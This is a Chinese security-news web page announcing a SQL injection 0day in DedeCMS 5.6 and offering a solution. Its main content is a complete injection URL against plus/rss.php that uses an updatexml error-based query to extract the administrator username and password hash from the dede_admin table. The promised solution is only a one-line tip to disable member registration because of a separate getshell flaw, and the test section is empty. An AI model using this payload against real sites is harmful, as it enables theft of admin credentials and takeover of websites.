频道栏目
首页 > 资讯 > 网站安全 > 正文

dedecms 5.6的最新注入0day漏洞及解决方案

10-08-06        来源:[db:作者]  
收藏   我要投稿

注入代码:

uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1




测试:

安全提示:

 

请关闭会员注册,会员中心存在getshell漏洞

 

 


注:首发tools,由情整理编辑

相关TAG标签
上一篇:天空(skycn)程序SQL注入漏洞及解决方案
下一篇:U盘木马不用慌!eSacnAV端口安全功能
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站